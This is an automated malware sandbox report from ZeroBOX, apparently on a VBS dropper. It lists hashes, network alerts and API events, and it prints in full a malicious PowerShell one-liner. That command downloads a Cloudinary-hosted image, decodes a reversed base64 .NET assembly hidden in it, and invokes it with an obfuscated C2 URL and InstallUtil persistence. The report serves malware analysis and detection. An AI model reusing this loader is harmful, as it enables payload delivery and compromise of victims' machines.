Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 12, 2025, 2:32 p.m.	Jan. 12, 2025, 3:08 p.m.

Size	217.8KB
Type	UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5	`3f691c4d5e1b53d16964d30e35863f77`
SHA256	`a666a99f2056082802f459f7180f891582a527324a16d34b4755ed63e5467882`
CRC32	`E37EDC4B`
ssdeep	`3072:A8gVmI3b0mgfmWu+ce9VOv5iG5sVhQ30Wk+70wgA1A:A8gVve9VOvM`
Yara	Malicious_Library_Zero - Malicious_Library Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\comonstraints.vbs
2568
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
  2648

Name	Response	Post-Analysis Lookup
res.cloudinary.com	CNAME e1315.dsca.akamaiedge.net CNAME ion.cloudinary.com.edgekey.net A 23.46.236.45	104.109.240.44

IP Address	Status	Action
164.124.101.2	Active	Moloch
23.46.236.45	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 23.46.236.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49164 23.46.236.45:443	C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2	C=IL, L=Petah Tikva, O=Cloudinary Ltd, CN=*.cloudinary.com	3c:38:41:3e:81:35:9e:7e:6d:34:b2:e4:fb:e2:0b:55:e7:bc:5d:73

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 12, 2025, 2:32 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 12, 2025, 2:32 p.m.			0	0

Command line console output was observed (50 out of 256 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The remote server retur console_handle: 0x00000023	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ned an error: (401) Unauthorized." console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: At line:1 char:614 console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: + if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [vo console_handle: 0x00000047	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: id]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not avai console_handle: 0x00000053	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: lable' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null console_handle: 0x0000005f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version N console_handle: 0x0000006b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ot available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredTex console_handle: 0x00000077	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: t = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.co console_handle: 0x00000083	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: m/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New- console_handle: 0x0000008f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: Object System.Net.WebClient;$altiplano = $demayne.DownloadData <<<< ($unshatter console_handle: 0x0000009b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: able);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentan console_handle: 0x000000a7	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: es = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.I console_handle: 0x000000b3	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented - console_handle: 0x000000bf	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarett console_handle: 0x000000cb	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: e = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarett console_handle: 0x000000d7	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: e);$florent = -join ($candygrams.ToCharArray() \| ForEach-Object { $_ })[-1..-($ console_handle: 0x000000e3	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$min console_handle: 0x000000ef	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: dfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home] console_handle: 0x000000fb	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: .GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lapplan console_handle: 0x00000107	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: d', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','La console_handle: 0x00000113	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ppland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVers console_handle: 0x0000011f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVe console_handle: 0x0000012b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: rsion } else { Write-Output 'PowerShell version Not available' };if ($null -ne console_handle: 0x00000137	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTab console_handle: 0x00000143	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: le.PSVersion } else { Write-Output 'PowerShell version Not available' }; console_handle: 0x0000014f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000015b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000167	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x00000187	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: Parameter name: bytes" console_handle: 0x00000193	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: At line:1 char:679 console_handle: 0x0000019f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: + if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [vo console_handle: 0x000001ab	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: id]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not avai console_handle: 0x000001b7	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: lable' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null console_handle: 0x000001c3	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version N console_handle: 0x000001cf	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ot available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredTex console_handle: 0x000001db	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: t = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.co console_handle: 0x000001e7	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: m/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New- console_handle: 0x000001f3	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable); console_handle: 0x000001ff	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: $medine = [System.Text.Encoding]::UTF8.GetString <<<< ($altiplano);$spiropentan console_handle: 0x0000020b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: es = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.I console_handle: 0x00000217	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented - console_handle: 0x00000223	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarett console_handle: 0x0000022f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: e = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarett console_handle: 0x0000023b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: e);$florent = -join ($candygrams.ToCharArray() \| ForEach-Object { $_ })[-1..-($ console_handle: 0x00000247	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$min console_handle: 0x00000253	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: dfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home] console_handle: 0x0000025f	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: .GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lapplan console_handle: 0x0000026b	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: d', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','La console_handle: 0x00000277	1	1
WriteConsoleW Jan. 12, 2025, 2:32 p.m.	buffer: ppland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVers console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0637c7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0637c7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0637c7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0637c7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0637c7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 12, 2025, 2:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0637c7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 12, 2025, 2:32 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg

Performs some HTTP requests (1 event)

request

GET https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg

Allocates read-write-execute memory (usually to unpack itself) (50 out of 160 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
